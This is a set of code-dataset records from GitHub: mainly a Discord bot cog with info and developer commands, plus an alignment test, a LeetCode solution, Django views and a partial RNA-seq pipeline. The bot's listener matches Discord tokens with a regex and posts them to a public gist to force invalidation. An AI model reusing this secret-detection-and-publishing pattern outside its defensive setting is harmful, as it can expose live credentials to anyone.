await ctx.send(\"You can't use it in a DM.\")\n\n    @commands.command(brief=\"a command to get the closest user.\")\n    async def closest_user(self, ctx, *, args=None):\n        if args is None:\n            return await ctx.send(\"please specify a user\")\n\n        if args and not self.bot.users:\n            return await ctx.send(\"There are no users cached :(\")\n\n        if args:\n            userNearest = discord.utils.get(self.bot.users, name=args)\n            user_nick = discord.utils.get(self.bot.users, display_name=args)\n\n            if userNearest is None:\n                userNearest = sorted(self.bot.users, key=lambda x: SequenceMatcher(None, x.name, args).ratio())[-1]\n\n            if user_nick is None:\n                user_nick = sorted(self.bot.users, key=lambda x: SequenceMatcher(None, x.display_name, args).ratio())[\n                    -1\n                ]\n\n            if isinstance(ctx.channel, discord.TextChannel):\n                member_list = [x for x in ctx.guild.members if x.nick]\n\n                nearest_server_nick = sorted(member_list, key=lambda x: SequenceMatcher(None, x.nick, args).ratio())[-1]\n\n            if isinstance(ctx.channel, discord.DMChannel):\n                nearest_server_nick = \"You unfortunately don't get the last value (a nickname) as it's a DM.\"\n\n            await ctx.send(f\"Username : {userNearest} \\nDisplay name : {user_nick} \\nNickname: {nearest_server_nick}\")\n\n    @commands.command(help=\"gives info on default emoji and custom emojis\", name=\"emoji\")\n    async def emoji_info(\n        self,\n        ctx: commands.Context,\n        *,\n        emojis: typing.Annotated[utils.EmojiConverter.ConvertedEmojis, utils.EmojiConverter],\n    ):\n        print(emojis, emojis.all, emojis.valid_emojis, emojis.invalid_emojis)\n        menu = utils.EmojiInfoEmbed(emojis.all, ctx=ctx, delete_after=True)  # type: ignore\n        await menu.send()\n\n    @commands.command(brief=\"gives info on 
emoji_id and emoji image.\")\n async def emoji_id(\n self,\n ctx,\n *,\n emoji: typing.Optional[typing.Union[discord.PartialEmoji, discord.Message, utils.EmojiBasic]] = None,\n ):\n if isinstance(emoji, discord.Message):\n emoji_message = emoji.content\n emoji = None\n\n with contextlib.suppress(commands.CommandError, commands.BadArgument):\n emoji = await utils.EmojiBasic.convert(\n ctx, emoji_message\n ) or await commands.PartialEmojiConverter().convert(ctx, emoji_message)\n\n if emoji:\n embed = discord.Embed(description=f\" Emoji ID: {emoji.id}\", color=random.randint(0, 16777215))\n embed.set_image(url=emoji.url)\n await ctx.send(embed=embed)\n\n else:\n await ctx.send(\"Not a valid emoji id.\")\n\n @commands.command()\n async def fetch_content(self, ctx, *, args=None):\n if args is None:\n await ctx.send(\"please send actual text\")\n\n if args:\n args = discord.utils.escape_mentions(args)\n args = discord.utils.escape_markdown(args, as_needed=False, ignore_links=False)\n\n for x in ctx.message.mentions:\n args = args.replace(x.mention, f\"\\{x.mention}\")\n\n emojis = emoji.emoji_lis(args)\n emojis_return = [d[\"emoji\"] for d in emojis]\n\n for x in emojis_return:\n args = args.replace(x, f\"\\{x}\")\n\n for x in re.findall(r\":\\w*:\\d*\", args):\n args = args.replace(x, f\"\\{x}\")\n\n await ctx.send(f\"{args}\", allowed_mentions=discord.AllowedMentions.none())\n\n @commands.command(brief=\"gives info about a role.\", aliases=[\"roleinfo\"])\n async def role_info(self, ctx, *, role: typing.Optional[discord.Role] = None):\n if role:\n await utils.roleinfo(ctx, role)\n # backend and how it works will be updated soon\n\n if not role:\n await ctx.send(f\"The role you wanted was not found.\")\n\n\nclass DevTools(commands.Cog):\n \"Helpful commands for developers in general\"\n\n def __init__(self, bot):\n self.bot = bot\n\n self.TOKEN_RE = re.compile(r\"[a-zA-Z0-9_-]{23,28}\\.[a-zA-Z0-9_-]{6,7}\\.[a-zA-Z0-9_-]{26}\\w{1}\")\n\n self.pool = self.bot.db\n\n async def cog_load(self):\n github_token = os.environ.get(\"github_token\")\n self.github = await github.GHClient(username=\"JDJGBot\", token=github_token)\n self.rtfm_dictionary = sorted(await self.bot.db.fetch(\"SELECT * FROM RTFM_DICTIONARY\"))\n self.tio = async_tio.Tio(session=self.bot.session)\n\n async def cog_unload(self):\n await self.github.close()\n\n @commands.Cog.listener()\n async def on_message(self, message):\n if not message.guild or message.guild.id != 1019027330779332660:\n return\n\n match = self.TOKEN_RE.findall(message.content)\n if match:\n gist = await self.github.create_gist(\n files=[github.File(fp=\"\\n\".join([m for m in match]), filename=\"token.txt\")],\n description=\"Token Detected, invalidated in process\",\n public=True,\n )\n\n await message.channel.send(\n f\"{message.author.mention} Token detected, invalidated in process.\\nGist: <{gist.url}>\"\n )\n\n @commands.command(brief=\"Tells bot if it should invalidate token.\")\n async def token_snipper(self, ctx):\n embed = discord.Embed(\n title=\"Token Snipper Tool\",\n description=\"It tells the bot if it should invalidate any discord tokens sent into chat\",\n color=random.randint(0, 16777215),\n timestamp=ctx.message.created_at,\n )\n embed.set_author(name=f\"{ctx.author}\", icon_url=ctx.author.display_avatar.url)\n embed.set_image(url=\"https://i.imgur.com/WPExfNr.gif\")\n embed.set_footer(text=\"This snipper snipes tokens she sees in chat.\")\n\n view = utils.TokenInvalidatorSettings(ctx)\n await ctx.send(\"Please pick the buttons below to 
pick.\", embed=embed, view=view)\n\n async def rtfm_lookup(self, url=None, *, args=None):\n if not args:\n return url\n\n else:\n unfiltered_results = await utils.rtfm(self.bot, url)\n\n results = fuzzy.finder(args, unfiltered_results, key=lambda t: t[0])\n\n if not results:\n return f\"Could not find anything with {args}.\"\n\n else:\n return results\n\n async def rtfm_send(self, ctx, results):\n if isinstance(results, str):\n await ctx.send(results, allowed_mentions=discord.AllowedMentions.none())\n\n else:\n embed = discord.Embed(color=random.randint(0, 16777215))\n\n results = results[:10]\n\n embed.description = \"\\n\".join(f\"[`{result}`]({result.url})\" for result in results)\n\n reference = utils.reference(ctx.message)\n await ctx.send(embed=embed, reference=reference)\n\n @commands.command(\n aliases=[\"rtd\", \"rtfs\", \"rtdm\"],\n invoke_without_command=True,\n brief=\"a rtfm command that allows you to lookup at any library we support looking up(using selects)\",\n )\n async def rtfm(self, ctx, *, args=None):\n view = utils.RtfmChoice(ctx, self.rtfm_dictionary, timeout=15.0)\n\n await ctx.send(content=\"Please Pick a library you want to parse\", view=view)\n\n await view.wait()\n\n await ctx.typing()\n\n results = await self.rtfm_lookup(url=view.value, args=args)\n\n await self.rtfm_send(ctx, results)\n\n @app_commands.command(description=\"looks up docs\", name=\"rtfm\")\n async def rtfm_slash(\n self, interaction: discord.Interaction, library: str, query: typing.Optional[str] = None\n ) -> None:\n \"\"\"Looks up docs for a library with optionally a query.\"\"\"\n if query is None or query == \"No Results Found\":\n return await interaction.response.send_message(f\"Alright Let's see \\n{library}\")\n\n await interaction.response.send_message(f\"Alright Let's see \\n{library+query}\")\n\n @rtfm_slash.autocomplete(\"library\")\n async def rtfm_library_autocomplete(self, interaction: discord.Interaction, current: str) -> list[Choice]:\n libraries = dict(self.rtfm_dictionary)\n\n all_choices: list[Choice] = [Choice(name=name, value=link) for name, link in libraries.items()]\n startswith: list[Choice] = [choices for choices in all_choices if choices.name.startswith(current)]\n if not (current and startswith):\n return all_choices[0:25]\n\n return startswith\n\n @rtfm_slash.autocomplete(\"query\")\n async def rtfm_query_autocomplete(self, interaction: discord.Interaction, current: str) -> list[Choice]:\n url = interaction.namespace.library or list(dict(self.rtfm_dictionary).values())[0]\n unfiltered_results = await utils.rtfm(self.bot, url)\n\n all_choices = [Choice(name=result.name, value=result.url.replace(url, \"\")) for result in unfiltered_results]\n\n if not current:\n return all_choices[:25]\n\n filtered_results = fuzzy.finder(current, unfiltered_results, key=lambda t: t[0])\n\n results = [Choice(name=result.name, value=result.url.replace(url, \"\")) for result in filtered_results]\n\n return results[0:25]\n\n @rtfm_slash.error\n async def rtfm_error(self, interaction: discord.Interaction, error) -> None:\n await interaction.response.send_message(f\"{error}! 
Please send this to my developer\", ephemeral=True)\n        print(error)\n        print(interaction.command)\n\n    def charinfo_converter(self, string):\n        digit = f\"{ord(string):x}\"\n        name = unicodedata.name(string, \"The unicode was not found\")\n        return f\"`\\\\U{digit:>08}`: {name} - {string} \\N{EM DASH} \"\n\n    @commands.command(brief=\"Gives you data about charinfo (based on R.danny's command)\")\n    async def charinfo(self, ctx, *, args=None):\n        if not args:\n            return await ctx.send(\"That doesn't help at all :(\")\n\n        values = \"\\n\".join(map(self.charinfo_converter, set(args)))\n\n        content = textwrap.wrap(values, width=2000)\n\n        menu = utils.charinfoMenu(content, ctx=ctx, delete_after=True)\n\n        await menu.send()\n\n    @commands.command(brief=\"a command to view the rtfm DB\")\n    async def rtfm_view(self, ctx):\n        rtfm_dictionary = dict(self.rtfm_dictionary)\n\n        pag = commands.Paginator(prefix=\"\", suffix=\"\")\n        for g in rtfm_dictionary:\n            pag.add_line(f\"{g} : {rtfm_dictionary.get(g)}\")\n\n        menu = utils.RtfmEmbed(pag.pages, ctx=ctx, delete_after=True)\n        await menu.send()\n\n    @commands.command(brief=\"a command to autoformat your python code to pep8\")\n    async def pep8(self, ctx):\n        modal = utils.CodeBlockView(ctx, timeout=180.0)\n        message = await ctx.send(\n            \"Please Submit the Code Block\\nDo you want to use black's line formatter at 120 (i.e. black -l 120 .), or just use the default? (i.e. black .):\",\n            view=modal,\n        )\n        await modal.wait()\n\n        if not modal.value:\n            return await ctx.reply(\"You need to give it code to work with it.\", mention_author=False)\n\n        code = codeblock_converter(argument=f\"{modal.value}\")\n\n        if modal.value2 is None or modal.value2 is False:\n            await message.edit(content=\"Default it is.\", view=None)\n\n        if modal.value2 is True:\n            await message.edit(content=\"Special formatting at 120 lines it is.\")\n\n        try:\n            code = await asyncio.to_thread(utils.formatter, code.content, bool(modal.value2))\n\n        except Exception as e:\n            return await message.edit(content=f\"Error Occurred with {e}\")\n\n        embed = discord.Embed(\n            title=\"Reformatted with Black\",\n            description=f\"code returned: \\n```python\\n{code}```\",\n            color=random.randint(0, 16777215),\n        )\n        embed.set_footer(text=\"Make sure you use python code, otherwise it will not work properly.\")\n        await message.edit(embed=embed)\n\n    @commands.command(brief=\"grabs your pfp's image\")\n    async def pfp_grab(self, ctx):\n        if_animated = ctx.author.display_avatar.is_animated()\n\n        save_type = \".gif\" if if_animated else \".png\"\n\n        file = await ctx.author.display_avatar.to_file(filename=f\"pfp{save_type}\")\n        try:\n            await ctx.send(content=\"here's your avatar:\", file=file)\n\n        except:\n            await ctx.send(\"it looks like it couldn't send the pfp due to the file size.\")\n\n    @commands.command(brief=\"Gives info on pypi packages\")\n    async def pypi(self, ctx, *, args=None):\n        # https://pypi.org/simple/\n\n        if args:\n            pypi_response = await self.bot.session.get(f\"https://pypi.org/pypi/{args}/json\")\n            if pypi_response.ok:\n                pypi_response = await pypi_response.json()\n\n                pypi_data = pypi_response[\"info\"]\n\n                embed = discord.Embed(\n                    title=f\"{pypi_data.get('name') or 'None provided'} {pypi_data.get('version') or 'None provided'}\",\n                    url=f\"{pypi_data.get('release_url') or 'None provided'}\",\n                    description=f\"{pypi_data.get('summary') or 'None provided'}\",\n                    color=random.randint(0, 16777215),\n                )\n\n                embed.set_thumbnail(url=\"https://i.imgur.com/oP0e7jK.png\")\n\n                embed.add_field(\n                    name=\"**Author Info**\",\n                    value=f\"**Author 
Name:** {pypi_data.get('author') or 'None provided'}\\n**Author Email:** {pypi_data.get('author_email') or 'None provided'}\",\n inline=False,\n )\n embed.add_field(\n name=\"**Package Info**\",\n value=f\"**Download URL**: {pypi_data.get('download_url') or 'None provided'}\\n**Documentation URL:** {pypi_data.get('docs_url') or 'None provided'}\\n**Home Page:** {pypi_data.get('home_page') or 'None provided'}\\n**Keywords:** {pypi_data.get('keywords') or 'None provided'}\\n**License:** {pypi_data.get('license') or 'None provided'}\",\n inline=False,\n )\n\n await ctx.send(embed=embed)\n\n else:\n await ctx.send(\n f\"Could not find package **{args}** on pypi.\", allowed_mentions=discord.AllowedMentions.none()\n )\n\n else:\n await ctx.send(\"Please look for a library to get the info of.\")\n\n @commands.command(brief=\"make a quick bot invite with 0 perms\")\n async def invite_bot(self, ctx, *, user: typing.Optional[discord.User] = commands.Author):\n if not user.bot:\n return await ctx.send(\"That's not a legit bot\")\n\n invite = discord.utils.oauth_url(client_id=user.id, scopes=(\"bot\",))\n slash_invite = discord.utils.oauth_url(client_id=user.id)\n\n view = discord.ui.View()\n view.add_item(\n discord.ui.Button(label=f\"{user.name}'s Normal Invite\", url=invite, style=discord.ButtonStyle.link)\n )\n view.add_item(\n discord.ui.Button(\n label=f\"{user.name}'s Invite With Slash Commands\", url=slash_invite, style=discord.ButtonStyle.link\n )\n )\n\n await ctx.send(f\"Invite with slash commands and the bot scope or only with a bot scope:\", view=view)\n\n @commands.command(brief=\"some old fooz command..\")\n async def fooz(self, ctx, *, args=None):\n if not args:\n await ctx.send(\"success\")\n\n if args:\n await ctx.send(\"didn't use it properly :(\")\n\n @commands.command(brief=\"puts the message time as a timestamp\")\n async def message_time(self, ctx):\n embed = discord.Embed(title=\"Message Time\", color=random.randint(0, 16777215), timestamp=ctx.message.created_at)\n embed.set_footer(text=f\"{ctx.message.id}\")\n\n await ctx.send(content=f\"Only here cause JDJG Bot has it and why not have it here now.\", embed=embed)\n\n @commands.command(brief=\"converts info about colors for you.\", invoke_without_command=True)\n async def color(self, ctx, *, color: utils.ColorConverter = None):\n if not color:\n return await ctx.send(\"you need to give me a color to use.\")\n\n await ctx.send(f\"Hexadecimal: {color} \\nValue : {color.value} \\nRGB: {color.to_rgb()}\")\n\n @commands.command(brief=\"a command that tells a user creation time.\")\n async def created_at(self, ctx, *, user: utils.SuperConverter = commands.Author):\n creation_info = f\"{discord.utils.format_dt(user.created_at, style = 'd')}\\n{discord.utils.format_dt(user.created_at, style = 'T')}\"\n\n await ctx.send(\n f\"\\nName : {user}\\nMention : {user.mention} was created:\\n{creation_info}\\nRaw Version: ```{creation_info}```\",\n allowed_mentions=discord.AllowedMentions.none(),\n )\n\n @commands.command(brief=\"a command that makes a fake user id based on the current time.\")\n async def fake_user_id(self, ctx):\n await ctx.send(f\"User id: {utils.generate_snowflake()}\")\n\n @commands.command(brief=\"gives information on snowflakes\")\n async def snowflake_info(self, ctx, *, snowflake: typing.Optional[utils.ObjectPlus] = None):\n if not snowflake:\n await ctx.send(\n \"you either returned nothing or an invalid snowflake now going to the current time for information.\"\n )\n\n # change objectplus convert back to the 
one before (discord.Object), same with utils.ObjectPlus, if discord.py merges my pull request into master.\n\n        generated_time = await utils.ObjectPlusConverter().convert(ctx, argument=f\"{int(utils.generate_snowflake())}\")\n\n        snowflake = snowflake or generated_time\n\n        embed = discord.Embed(title=\"❄️ SnowFlake Info:\", color=5793266)\n\n        embed.add_field(\n            name=\"Created At:\",\n            value=f\"{discord.utils.format_dt(snowflake.created_at, style = 'd')}\\n{discord.utils.format_dt(snowflake.created_at, style = 'T')}\",\n        )\n\n        embed.add_field(name=\"Worker ID:\", value=f\"{snowflake.worker_id}\")\n\n        embed.add_field(name=\"Process ID:\", value=f\"{snowflake.process_id}\")\n\n        embed.add_field(name=\"Increment:\", value=f\"{snowflake.increment_id}\")\n\n        embed.set_footer(text=f\"Snowflake ID: {snowflake.id}\")\n\n        await ctx.send(embed=embed)\n\n    @commands.command(brief=\"Generates a fake token from the current time\")\n    async def fake_token(self, ctx):\n        object = discord.Object(utils.generate_snowflake())\n\n        first_encoded = base64.b64encode(f\"{object.id}\".encode())\n        first_bit = first_encoded.decode().rstrip(\"=\")\n\n        timestamp = int(object.created_at.timestamp() - 129384000)\n        d = timestamp.to_bytes(4, \"big\")\n        second_bit_encoded = base64.standard_b64encode(d)\n        second_bit = second_bit_encoded.decode().rstrip(\"=\")\n\n        last_bit = secrets.token_urlsafe(20)\n\n        embed = discord.Embed(\n            title=f\"Newly Generated Fake Token\",\n            description=f\"ID: ``{object.id}``\\nCreated at : \\n{discord.utils.format_dt(object.created_at, style = 'd')}\\n{discord.utils.format_dt(object.created_at, style = 'T')}\",\n        )\n        embed.add_field(name=\"Generated Token:\", value=f\"``{first_bit}.{second_bit}.{last_bit}``\")\n        embed.set_thumbnail(url=ctx.author.display_avatar.url)\n        embed.set_footer(text=f\"Requested by {ctx.author}\")\n\n        await ctx.send(\"We generated a fake token :clap:\", embed=embed)\n\n    @commands.cooldown(1, 60, BucketType.user)\n    @commands.command(brief=\"makes a request to add a bot to the test guild\")\n    async def addbot(self, ctx, *, user: typing.Optional[discord.User] = commands.Author):\n        if not user.bot:\n            ctx.command.reset_cooldown(ctx)\n            return await ctx.send(\"Please use a **Bot** ID, not a **User** ID.\")\n\n        modal = utils.AddBotView(ctx, timeout=180.0)\n        message = await ctx.send(\"Please tell us the reason you want to add your bot to the Test Guild:\", view=modal)\n        await modal.wait()\n\n        if modal.value is None:\n            ctx.command.reset_cooldown(ctx)\n            return await message.edit(content=\"Provide a reason why you want your bot added to the guild.\")\n\n        guild = self.bot.get_guild(438848185008390158)\n        member = await self.bot.try_member(guild, ctx.author.id)\n        if member is None:\n            view = discord.ui.View()\n            view.add_item(\n                discord.ui.Button(\n                    label=f\"Test Guild Invite\",\n                    url=\"https://discord.gg/hKn8qgCDzK\",\n                    style=discord.ButtonStyle.link,\n                    row=1,\n                )\n            )\n            return await message.edit(\n                content=\"Make sure to join the guild linked soon... then rerun the command. 
If you are in the guild, contact the owner (the owner is listed in the owner command)\",\n                view=view,\n            )\n\n        embed = discord.Embed(\n            title=\"Bot Request\",\n            colour=discord.Colour.blurple(),\n            description=f\"reason: \\n{modal.value}\\n\\n[Invite URL]({discord.utils.oauth_url(client_id = user.id, scopes=('bot',))})\",\n            timestamp=ctx.message.created_at,\n        )\n\n        embed.add_field(name=\"Author\", value=f\"{ctx.author} (ID: {ctx.author.id})\", inline=False)\n        embed.add_field(name=\"Bot\", value=f\"{user} (ID: {user.id})\", inline=False)\n\n        embed.set_footer(text=ctx.author.id)\n        embed.set_author(name=user.id, icon_url=user.display_avatar.with_format(\"png\"))\n\n        jdjg = self.bot.get_user(168422909482762240)\n        benitz = self.bot.get_user(529499034495483926)\n\n        await self.bot.get_channel(852897595869233182).send(content=f\"{jdjg.mention} {benitz.mention}\", embed=embed)\n        # placeholder\n\n        await ctx.reply(\n            f\"It appears adding your bot worked. \\nIf you leave your bot will be kicked, unless you have an alt there, a friend, etc. \\n(It will be kicked to prevent raiding and taking up guild space if you leave). \\nYour bot will be checked out. {jdjg} will then determine if your bot is good to add to the guild. Make sure to open your DMs to JDJG, so he can DM you about the bot being added. \\nIf you don't add him, your bot will be denied.\"\n        )\n\n    @commands.command(\n        brief=\"a command that takes a url and sees if it's an image (requires embed permissions at the moment).\"\n    )\n    async def image_check(self, ctx):\n        await ctx.send(\n            \"Please wait for Discord to edit your message; if it errors about not being a valid image, please send a screenshot of your usage and the bot's message.\"\n        )\n        await asyncio.sleep(5)\n\n        images = list(filter(lambda e: e.type == \"image\", ctx.message.embeds))\n\n        if not images or not ctx.message.embeds:\n            return await ctx.send(\n                \"You need to pass a URL with an image; if you did, then please run again. 
This is a Discord issue, and I do not want to wait for Discord to change its message.\"\n            )\n\n        await ctx.send(f\"You have {len(images)} / {len(ctx.message.embeds)} links that are valid images.\")\n\n    @commands.command(brief=\"Gives info on npm packages\")\n    async def npm(self, ctx, *, args=None):\n        if args:\n            npm_response = await self.bot.session.get(f\"https://registry.npmjs.com/{args}\")\n\n            if npm_response.ok:\n                npm_response = await npm_response.json()\n\n                data = utils.get_required_npm(npm_response)\n                await ctx.send(embed=utils.npm_create_embed(data))\n\n            else:\n                await ctx.send(\n                    f\"Could not find package **{args}** on npm.\", allowed_mentions=discord.AllowedMentions.none()\n                )\n\n        else:\n            await ctx.send(\"Please look for a library to get the info of.\")\n\n    @commands.cooldown(1, 30, BucketType.user)\n    @commands.command(\n        brief=\"runs some code in a sandbox (based on Soos's Run command)\", aliases=[\"eval\", \"run\", \"sandbox\"]\n    )\n    async def console(self, ctx, *, code: codeblock_converter = None):\n        if not code:\n            ctx.command.reset_cooldown(ctx)\n            return await ctx.send(\"You need to give me some code to use, otherwise I cannot determine what it is.\")\n\n        if not code.language:\n            ctx.command.reset_cooldown(ctx)\n            return await ctx.send(\"You must provide a language to use.\")\n\n        if not code.content:\n            ctx.command.reset_cooldown(ctx)\n            return await ctx.send(\"No code provided\")\n\n        output = await self.tio.execute(f\"{code.content}\", language=f\"{code.language}\")\n\n        text_returned = (\n            f\"```{code.language}\\n{output}```\"\n            if len(f\"{output}\") < 200\n            else await utils.post(self.bot, code=f\"{output}\")\n        )\n\n        embed = discord.Embed(\n            title=f\"Your code exited with code {output.exit_status}\", description=f\"{text_returned}\", color=242424\n        )\n\n        embed.set_author(name=f\"{ctx.author}\", icon_url=ctx.author.display_avatar.url)\n\n        embed.set_footer(text=\"Powered by Tio.run\")\n\n        await ctx.send(content=\"I executed your code in a sandbox\", embed=embed)\n\n\nasync def setup(bot):\n    await bot.add_cog(Info(bot))\n    await bot.add_cog(DevTools(bot))\n","repo_name":"JDsProjects/JDBot","sub_path":"cogs/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":32811,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"}
+{"seq_id":"8519868010","text":"import os\nfrom pathlib import Path\nimport numpy as np\nfrom dtaidistance import alignment\n\n\ndirectory = None\n\n\ndef test_sequences1():\n    \"\"\"Example from https://en.wikipedia.org/wiki/Needleman–Wunsch_algorithm. 
\"\"\"\n s1 = \"GATTACA\"\n s2 = \"GCATGCU\"\n value, matrix = alignment.needleman_wunsch(s1, s2)\n algn, s1a1, s2a1 = alignment.best_alignment(matrix, s1, s2, gap='-')\n matrix_sol = [\n [-0., -1., -2., -3., -4., -5., -6., -7.],\n [-1., 1., -0., -1., -2., -3., -4., -5.],\n [-2., -0., -0., 1., -0., -1., -2., -3.],\n [-3., -1., -1., -0., 2., 1., -0., -1.],\n [-4., -2., -2., -1., 1., 1., -0., -1.],\n [-5., -3., -3., -1., -0., -0., -0., -1.],\n [-6., -4., -2., -2., -1., -1., 1., -0.],\n [-7., -5., -3., -1., -2., -2., -0., -0.]]\n algn_sol1 = [['G', '-', 'A', 'T', 'T', 'A', 'C', 'A'], ['G', 'C', 'A', 'T', '-', 'G', 'C', 'U']]\n assert value == 0.0\n assert np.array_equal(matrix, matrix_sol)\n assert s1a1 == algn_sol1[0]\n assert s2a1 == algn_sol1[1]\n\n\nif __name__ == \"__main__\":\n directory = Path(os.environ.get('TESTDIR', Path(__file__).parent))\n print(f\"Saving files to {directory}\")\n test_sequences1()\n","repo_name":"voskresenskiianton/time-series-clustering","sub_path":"dtaidistance-master/tests/test_alignment.py","file_name":"test_alignment.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"70370081653","text":"from binarytree import *\r\np=Node(3)\r\np.left=Node(9)\r\np.right=Node(20)\r\np.right.left=Node(15)\r\np.right.right=Node(7)\r\n# p.right.left=Node(4)\r\nprint(p)\r\n# Definition for a binary tree node.\r\nclass TreeNode:\r\n def __init__(self, val=0, left=None, right=None):\r\n self.val = val\r\n self.left = left\r\n self.right = right\r\nclass Solution:\r\n def zigzagLevelOrder(self, root: TreeNode) :\r\n if root is None:\r\n return []\r\n res=[]\r\n i=0\r\n queue=[root]\r\n while(queue):\r\n tmp=[]\r\n ret=([node.val for node in queue])#####ret只存每一层的val\r\n for node in queue:\r\n if node.left:\r\n tmp.append(node.left)\r\n if node.right:\r\n tmp.append(node.right)\r\n queue=tmp\r\n if (i%2)==0:\r\n res.append(ret)\r\n else:\r\n res.append(ret[::-1])\r\n i+=1\r\n return res\r\na=Solution()\r\nprint(a.zigzagLevelOrder(p))","repo_name":"gouwei222/leetcode-python3","sub_path":"leetcode103.py","file_name":"leetcode103.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"37122853217","text":"# Django Imports\nfrom django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, renderer_classes\nfrom rest_framework.renderers import JSONRenderer, TemplateHTMLRenderer\n\n# Local Imports\nfrom Tasks.models import Task\nfrom Tasks.serializers import TaskSerializer\n# Create your views here.\n\n\n@api_view(('GET',))\ndef TaskListView(request, *args, **kwargs):\n queryset = Task.objects.all()\n serializer = TaskSerializer(queryset, many=True)\n return Response(serializer.data)\n\n\n@api_view(('GET',))\ndef TaskDetailView(request, pk):\n queryset = Task.objects.get(id=pk)\n serializer = TaskSerializer(queryset, many=False)\n return Response(serializer.data)\n\n\n@api_view(('POST',))\ndef TaskCreateView(request, *args):\n serializer = TaskSerializer(data=request.data)\n if serializer.is_valid(): serializer.save()\n return Response(serializer.data)\n\n\n@api_view(('POST',))\ndef TaskUpdateView(request, pk):\n task = Task.objects.get(id=pk)\n serializer = TaskSerializer(instance=task, data=request.data)\n if serializer.is_valid():serializer.save()\n return Response(serializer.data)\n\n\n@api_view(('DELETE',))\ndef 
TaskDeleteView(request, pk):\n task = Task.objects.get(id=pk)\n task.delete()\n return Response(\"Task was deleted\")\n","repo_name":"amitkakde007/To-Do-App","sub_path":"ToDoApp/Tasks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9718128338","text":"# scripts to run data analysis on tuberous sclerosis mice\nfrom bipy.cluster import start_cluster, stop_cluster\nimport sys\nimport yaml\nfrom bipy.log import setup_logging, logger\nfrom bcbio.utils import safe_makedir, file_exists\nimport csv\nimport os\nfrom bipy.utils import (append_stem, combine_pairs, flatten, dict_to_vectors,\n prepare_ref_file, replace_suffix)\nfrom bipy.toolbox import (fastqc, sickle, cutadapt_tool, tophat,\n htseq_count, deseq, fastq, annotate, rseqc, sam)\nfrom bcbio.broad import BroadRunner, picardrun\n\nimport glob\nfrom itertools import product, repeat\n\n\ndef _get_stage_config(config, stage):\n return config[\"stage\"][stage]\n\n\ndef _get_program(config, stage):\n return config[\"stage\"][stage][\"program\"]\n\n\ndef _emit_stage_message(stage, curr_files):\n logger.info(\"Running %s on %s\" % (stage, curr_files))\n\ndef _find_input_files(config):\n input_dirs = config[\"input_dirs\"]\n \"\"\" find all of the fastq files by identifier \"\"\"\n identifier = config[\"sample_parse\"][\"identifier\"]\n input_files = [glob.glob(os.path.join(config[\"dir\"][\"data\"],\n input_dir,\n identifier))\n for input_dir in input_dirs]\n return list(flatten(input_files))\n\n\ndef _group_input_by_condition(in_files, delimiter = \"_\"):\n def _add_entry(d, v):\n base = os.path.basename(v)\n k = base.split(delimiter)[1]\n d[k] = d.get(k, []) + [v]\n return d\n\n return reduce(_add_entry, in_files, {})\n\n\ndef _group_input_by_cell_type(in_files, delimiter = \"_\"):\n def _add_entry(d, v):\n base = os.path.basename(v)\n k = base.split(delimiter)[0]\n if \"PbN\" in k:\n d[\"PbN\"] = d.get(\"PbN\", []) + [v]\n elif \"Pb\" in k:\n d[\"Pb\"] = d.get(\"Pb\", []) + [v]\n else:\n logger.error(\"Error grouping by cell type\")\n exit(-1)\n return d\n\n return reduce(_add_entry, in_files, {})\n\n\ndef main(config_file):\n with open(config_file) as in_handle:\n config = yaml.load(in_handle)\n\n # make the needed directories\n map(safe_makedir, config[\"dir\"].values())\n\n # specific for thesis pipeline\n input_dirs = config[\"input_dirs\"]\n\n results_dir = config[\"dir\"].get(\"results\", \"results\")\n input_files = _find_input_files(config)\n conditions = _group_input_by_condition(input_files)\n logger.info(\"Input_files: %s\" % (input_files))\n logger.info(\"Condition groups %s\" %(conditions))\n htseq_outdict = {}\n\n for condition, curr_files in conditions.items():\n condition_dir = os.path.join(results_dir, condition)\n safe_makedir(condition_dir)\n config[\"dir\"][\"results\"] = condition_dir\n\n for stage in config[\"run\"]:\n if stage == \"fastqc\":\n _emit_stage_message(stage, curr_files)\n fastqc_config = _get_stage_config(config, stage)\n fastqc_args = zip(*product(curr_files, [fastqc_config],\n [config]))\n view.map(fastqc.run, *fastqc_args)\n\n if stage == \"cutadapt\":\n _emit_stage_message(stage, curr_files)\n cutadapt_config = _get_stage_config(config, stage)\n cutadapt_args = zip(*product(curr_files, [cutadapt_config],\n [config]))\n cutadapt_outputs = view.map(cutadapt_tool.run, *cutadapt_args)\n curr_files = cutadapt_outputs\n logger.info(\"Fixing mate pair information.\")\n pairs = 
combine_pairs(curr_files)\n first = [x[0] for x in pairs]\n second = [x[1] for x in pairs]\n logger.info(\"Forward: %s\" % (first))\n logger.info(\"Reverse: %s\" % (second))\n fixed = view.map(fastq.fix_mate_pairs_with_config,\n first, second, [config] * len(first))\n curr_files = list(flatten(fixed))\n\n if stage == \"sickle\":\n _emit_stage_message(stage, curr_files)\n pairs = combine_pairs(curr_files)\n first = [x[0] for x in pairs]\n second = [x[1] for x in pairs]\n fixed = view.map(sickle.run_with_config,\n first, second, [config] * len(first))\n curr_files = list(flatten(fixed))\n\n if stage == \"tophat\":\n _emit_stage_message(stage, curr_files)\n tophat_config = _get_stage_config(config, stage)\n pairs = combine_pairs(curr_files)\n first = [x[0] for x in pairs]\n second = [x[1] for x in pairs]\n logger.info(\"first %s\" % (first))\n logger.info(\"second %s\" % (second))\n\n #tophat_args = zip(*product(first, second, [config[\"ref\"]],\n # [\"tophat\"], [config]))\n tophat_outputs = view.map(tophat.run_with_config,\n first, second,\n [config[\"ref\"]] * len(first),\n [\"tophat\"] * len(first),\n [config] * len(first))\n bamfiles = view.map(sam.sam2bam, tophat_outputs)\n bamsort = view.map(sam.bamsort, bamfiles)\n view.map(sam.bamindex, bamsort)\n final_bamfiles = bamsort\n curr_files = tophat_outputs\n\n if stage == \"htseq-count\":\n _emit_stage_message(stage, curr_files)\n htseq_config = _get_stage_config(config, stage)\n htseq_args = zip(*product(curr_files, [config], [stage]))\n htseq_outputs = view.map(htseq_count.run_with_config,\n 